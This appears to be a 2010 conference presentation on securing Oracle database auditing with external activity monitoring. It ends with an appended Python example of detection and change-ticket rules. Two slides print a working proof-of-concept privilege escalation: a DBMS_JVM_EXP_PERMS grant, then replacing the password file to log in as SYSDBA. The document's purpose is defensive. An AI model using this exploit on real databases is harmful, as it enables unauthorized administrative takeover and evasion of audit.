Securely Recording The Use of Privilege In Oracle Databases
Paul M. Wright, June 2010, for Sentrigo

Overview of presentation
• State of database auditing today.
• Problems with Oracle audit >> demo!
• Solution >> Database Application Activity Monitoring Systems (DAMS).
• SAS70 project I completed in financial services using Hedgehog DAMS.
• Advanced DAMS usage:
  – Fix Java zero days in Oracle
  – Verifying DBA change tickets using DAMS
  – Record and protect use of DBA privilege
• Future of DAMS.

State of Database auditing today
Database auditing is before the wheel... If we consider the security monitoring of a bank vault...

DB is the modern Bank Vault
• Do bank managers say things like "I am sorry, but we cannot monitor the vault today because it may become too slow to use"?
• Of course not, but:
  – DBs are NOT monitored due to performance concerns.
• Does the Bank Manager get to switch off the cameras in the vault when they want?
  – DBA privilege is enough to turn off Database auditing.
• An organisation's data can be as valuable as money kept in a vault.
• But the ability to securely record access has not been widely available.

Known problems with Oracle Audit
• SYSDBA privilege can modify the audit trail in SYS.AUD$.
• OSDBA privilege can modify the .aud files in $ORACLE_HOME/rdbms/audit.
• Low priv accounts can escalate to SYSDBA.
• There are new ways for low privileged accounts to evade audit in current Oracle versions.
• Revoking execute on DBMS_SYS_SQL helps reduce some of the risk.
• But surely Syslog audit in 10.2 and 11g is now secure?

How secure is Syslog audit?
• In >= 10.2 AUDIT_SYSLOG_LEVEL sends audit to Syslog, remotely or locally (here to /var/log/secure), a file which is only accessible to root.
    [oracle@linuxbox ~]$ cat /var/log/secure
    cat: /var/log/secure: Permission denied
    [oracle@linuxbox ~]$ su - root
    Password:
    [root@linuxbox ~]# cat /var/log/secure
    May 17 16:51:39 linuxbox su: pam_unix(su-l:session):

• When AUDIT_SYSLOG_LEVEL is set and AUDIT_SYS_OPERATIONS is TRUE, all SYS* operations are recorded to Syslog (here /var/log/messages) even if AUDIT_TRAIL is set to NONE! Which file receives the entries depends on the facility.level given in AUDIT_SYSLOG_LEVEL and on the syslog daemon's configuration.
• Or, if AUDIT_TRAIL is set to DB, SYS* actions still go to Syslog and non-SYS* actions go to SYS.AUD$.
• This has been incorrectly recommended as secure by a number of authors.
• Ok... Syslog is an improvement on traditional Oracle OS audit via *.aud files, which are accessible from the oracle unix account.
• If DBA accounts do not have root access, the AUDIT_SYSLOG_LEVEL parameter can provide some separation of duty between the UNIX sysadmin (root) and the Oracle DBA/OSDBA accounts.

Effective Audit has to be external
• Banking separates root access from the DBA account.
• So there is value in using AUDIT_SYSLOG_LEVEL?
• But code run as SYS can still turn off the audit trail, because audit is controlled from within the DB!
• The act of turning off Oracle audit can be hidden.
• The only evidence of escalation to SYS would be a mandatory audit entry showing the SYS connection and the DB restart, i.e. routine-looking entries >> ignored.
• A low priv user can bypass audit using DBMS_SYS_SQL.
• Effective audit has to be external >> DEMO

External audit solution is DAMS
• DAMS = external audit, outside of DBA privs.
• Either host based, on the OS of the DB or of the app/web server.
• Or network based, an appliance on a tap.
• Both alert to SQL queries and session info.
• Enables us to see into the black box of the DB.
• How do these two methods compare?

Host vs network based DAMS
• Host based has the following advantages:
  – Read encrypted/obfuscated exploits.
  – Recognise schemas when not specified.
  – See through a synonym using the object keyword.
  – Trace dependencies between packages.
  – Read SSH'd connections.
  – Monitor local bequeath connections from the OS.
  – Cannot be turned off by OSDBA/SYSDBA privs.
• Common objections to host-based agents from DBAs are that agents can be:
  – Unreliable.
  – Resource intensive.
  – Adding complexity to an already complex system.
  – Also monitoring DBAs, which they might not like.
• In my experience on a recent 1.5 year SAS70 project, Sentrigo Hedgehog is reliable and performant.

SAS70 Project Overview
• Financial services SAS70 project.
• Gained compliance with Sentrigo Hedgehog:
  – IDS and IPS with prewritten rules.
  – User activity monitoring and alerting.
  – Low CPU, ~ less than 1%.
  – High reliability.
  – Did not affect the workings of the DB itself.
• Project published by UKOUG. Champagne all round.

DAMS Server Implementation

Production CPU% of HH sensor
[Figure: %CPU of the Hedgehog sensor on orc001a, measured with top, over 24 hours; y-axis 0 to 1.2 %CPU, x-axis time from 00:00 through to 04:48 the next day.]

Published by UKOUG Nov 2009
The SAS70 Sentrigo Hedgehog DAMS project was published in the UKOUG SCENE journal (Nov 2009) and highlighted positively in the editorial.

Advanced DAMS usage
Installation, setup and testing were reasonably straightforward. Then extended with advanced DAMS usage:
1. Fixed Java priv zero days before the patch, by scoping the effect of the change beforehand using DAMS.
2. Verified DBA change tickets afterwards using DAMS.
Benefits:
• Faster QA process = competitive advantage
• Lower risk Prod changes = more resilient systems
• Protection of the DBA privilege = more security

How to fix Java zero days?
• I received advance notification of "Hacking Aurora in 11g" by David Litchfield.
• Zero days. No patch.
• Exploit code could be released any day.
• Analysed the exploit code and defined a fix.
• Revoke public execute from a number of PL/SQL packages and Java classes.
• But what about the effects of that fix on the rest of the applications?
• This is really a change management problem.

Change management methodology
• How does change management usually work?
• Rely on devs to understand the effects of a change.
• Problems are:
  – complexity
  – lack of communication and clear documentation
  – political fiefdoms in an organisation protect their own part of the app.
• Common solution is to use a time delay before changes.
• If a change does not break QA for a month, put it in Production.
• But this is slow and could still miss bugs.
• What about using Hedgehog to enable safe fix testing?
• If we can see how a DB/application mechanism works using a DAMS, we can predict the effect of a fix.

PL/SQL Java privilege escalation
• PoC code is adapted so that it works on 10g.
• I was first to publish that it also affected 10.2.0.4.3.
• It grants privileges to execute any file on the OS which is owned by oracle.

    SQL> DECLARE
      2  POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
      3  CURSOR C1 IS SELECT 'GRANT',USER(),'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' FROM DUAL;
      4  BEGIN
      5  OPEN C1;
      6  FETCH C1 BULK COLLECT INTO POL;
      7  CLOSE C1;
      8  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
      9  END;
     10  /
    DECLARE
    *
    ERROR at line 1:
    ORA-29532: Java call terminated by uncaught Java exception: java.lang.SecurityException: policy table update java.lang.RuntimePermission, loadLibrary.*
    ORA-06512: at "SYS.DBMS_JVM_EXP_PERMS", line 189
    ORA-06512: at line 8

• The ORA-29532 exception is raised after the GRANT row has already been written to the Java policy table, so despite the error the execute permission is in place; the next slide relies on it.

How to use Java priv to gain SYSDBA
PoC code which uses that execute privilege to gain SYSDBA on 11g:

    --Backup the password file:
    SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper mv /u01/app/oracle/product/11.2.0/db_1/dbs/orapwDB11G /u01/app/oracle/product/11.2.0/db_1/dbs/orapwDB11Gbu') FROM dual;
    --Recreate the password file with a known password:
    SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main', '/u01/app/oracle/product/11.2.0/db_1/bin/orapwd', 'file=/u01/app/oracle/product/11.2.0/db_1/dbs/orapwDB11G', 'password=attackersyspassword') FROM dual;

    sqlplus /nolog
    conn sys/attackersyspassword@192.168.1.2/DB11G as sysdba

Revoke PUBLIC execute
For < 10.2.0.4.4 this is the main revoke:

    revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

• But what is the effect of this revoke on the rest of the DB and the applications that access it?
• How do I scope it before making the change?
• Used normal static analysis of source code and consulted with devs and DBAs.
• DAMS rules to record access to the vulnerable packages.

Hedgehog Rules monitor vulns
Before the revoke is done, check that DBMS_JVM_EXP_PERMS is not in use, with HH rules:

    --Records successful executions of SYS.DBMS_JVM_EXP_PERMS
    Object='SYS.DBMS_JVM_EXP_PERMS';
    --Records strings containing 'DBMS_JVM_EXP_PERMS' (includes failed attempts).
    Statement contains 'DBMS_JVM_EXP_PERMS';
    --Test the rules with a stimulus to make sure they work.
    Select 'DBMS_JVM_EXP_PERMS' from dual;

1. Wait for alerts to be generated.
2. No alerts recorded, even when using datapump.
3. So the revokes can be done with low risk.
Can do the same for other packages such as SYS.DBMS_SYS_SQL.

Securing Java In Oracle
• Could use this method for all Java classes in the DB, to scope removing the JVM completely.
• DBMS_JAVA and DBMS_JAVA_TEST do not have public execute revoked in the latest CPU for 11g.
• The vulnerability is dealt with only by revoking public execute from oracle/aurora/util/Wrapper.
• So an attacker could use a different vector through DBMS_JAVA.
• For example, an attacker could write their own Wrapper class if they had the CREATE PROCEDURE privilege.

Verifying Change Tickets
Main aim is to monitor the DBA privilege, not the DBA person.
• The vast majority of DBAs are honest and very hard working.
• But low priv accounts can be escalated to DBA.
• With HH we are protecting the DBA's privilege by:
  – Accurately recording DBA privilege usage.
  – Cross-referencing the DAMS alert to the JIRA change ticket number carried in the change SQL.
  – Escalating the alert if there is no change ticket for the DDL event recorded in HH.
• Can only do this when the DAMS has a forensic level of accuracy, i.e. no false positives!

Results of Project for the Business
1. DAMS installation gained SAS70 compliance.
2. Assurance of knowing the DB had not been exploited.
3. QA to production process had lower risk.
4. Halved the time fixes spent in QA.
5. Fixed zero days before Oracle patched.
6. Verification of change tickets.
7. SYS privilege usage protected and recorded.

Where is this leading?
1. First we had IDS/IPS... SANS.
2. Then User/App activity monitoring and DAMS.
3. Now DAMS change management integration.
4. Next stage is automated proactive state checking of code, configuration and user privileges on remote hosts from a central state repository.
  – Repscan/PFCLScan can be used for these purposes.
  – Alert to regression of previously fixed vulnerabilities.
  – Verification that policy is being kept to.

Summary
• In addition to IPS and account activity monitoring:
  – DAMS can be used to shorten the SDLC.
  – Reduce the risk of development changes.
  – Bring transparency to the workings of the database application mechanism.
• Host based DAMS provide the best method of securely recording the use of privilege in the Oracle database.
• Questions?
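Added example, serving both the "Hedgehog Rules monitor vulns" slide and the "Verifying Change Tickets" slide: a small DAMS-style rule engine over a stream of captured SQL statements. It is not code from the presentation, from Sentrigo or from Hedgehog; it only models the two rule kinds the deck describes (an object rule that fires on a resolved package execution, a statement rule that is a plain text match and therefore also catches failed attempts and the stimulus test) and the change-ticket check that escalates DDL with no ticket reference. The event shape, the JIRA key format (e.g. DBA-1042), the rule names and the sample statements are all constructed assumptions for this example.

```python
import re
from dataclasses import dataclass
from typing import Callable, Tuple


# Assumed event shape: what a host-based sensor hands us per captured statement.
# A host agent can resolve object names even when the schema is not given; that
# is modelled by `objects`. Failed statements may carry no resolved objects.
@dataclass
class SqlEvent:
    user: str
    statement: str
    objects: Tuple[str, ...] = ()
    succeeded: bool = True


@dataclass
class Rule:
    name: str
    severity: str
    match: Callable[[SqlEvent], bool]


COMMENT_RE = re.compile(r"/\*.*?\*/|--[^\n]*", re.S)
DDL_RE = re.compile(r"^\s*(CREATE|ALTER|DROP|GRANT|REVOKE|TRUNCATE)\b", re.I)
TICKET_RE = re.compile(r"\b[A-Z][A-Z0-9]+-\d+\b")   # assumed JIRA key format


def object_rule(obj: str) -> Callable[[SqlEvent], bool]:
    """Counterpart of  Object='SYS.DBMS_JVM_EXP_PERMS' : fires only when the
    sensor resolved the package as an executed object (successful executions)."""
    obj = obj.upper()
    return lambda ev: obj in {o.upper() for o in ev.objects}


def statement_rule(text: str) -> Callable[[SqlEvent], bool]:
    """Counterpart of  Statement contains 'DBMS_JVM_EXP_PERMS' : a text match, so
    it also fires on failed attempts and on the string-literal stimulus test."""
    text = text.upper()
    return lambda ev: text in ev.statement.upper()


def ticket_for(ev: SqlEvent):
    """Change ticket referenced anywhere in the statement (usually a comment)."""
    m = TICKET_RE.search(ev.statement)
    return m.group(0) if m else None


def is_ddl(ev: SqlEvent) -> bool:
    # strip comments first so a leading /* DBA-1042 */ does not hide the verb
    return bool(DDL_RE.match(COMMENT_RE.sub(" ", ev.statement)))


def ddl_without_ticket(ev: SqlEvent) -> bool:
    """Change-ticket verification: DDL with no ticket reference is escalated."""
    return is_ddl(ev) and ticket_for(ev) is None


RULES = [
    Rule("jvm_exp_perms_object", "high", object_rule("SYS.DBMS_JVM_EXP_PERMS")),
    Rule("jvm_exp_perms_statement", "medium", statement_rule("DBMS_JVM_EXP_PERMS")),
    Rule("ddl_without_ticket", "escalate", ddl_without_ticket),
]


def evaluate(events, rules=RULES):
    """Return (rule name, severity, user, statement) for every rule that fires."""
    return [(r.name, r.severity, ev.user, ev.statement.strip())
            for ev in events for r in rules if r.match(ev)]


# Constructed sample capture (not real data).
SAMPLE_EVENTS = [
    SqlEvent("LOWPRIV", "BEGIN DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(pol); END;",
             objects=("SYS.DBMS_JVM_EXP_PERMS",)),          # successful execution
    SqlEvent("LOWPRIV", "BEGIN DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(pol); END;",
             succeeded=False),                             # failed attempt
    SqlEvent("PAUL", "SELECT 'DBMS_JVM_EXP_PERMS' FROM dual"),   # stimulus test
    SqlEvent("DBA1", "ALTER USER appuser ACCOUNT LOCK /* DBA-1042 */"),  # ticketed DDL
    SqlEvent("LOWPRIV", "GRANT DBA TO lowpriv"),           # DDL with no ticket
    SqlEvent("APP", "SELECT * FROM orders WHERE id = :1"), # ordinary DML
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

On the sample capture the object rule fires once (only the resolved execution), the statement rule three times (execution, failed attempt and the stimulus), and the ticket check escalates the bare GRANT while letting the ticketed ALTER USER through. The ticket check verifies process, not intent: anyone with DBA privilege can paste a ticket key into a comment, so the DDL must still be recorded and cross-referenced against the ticket system afterwards, which is the point of monitoring the privilege rather than the person.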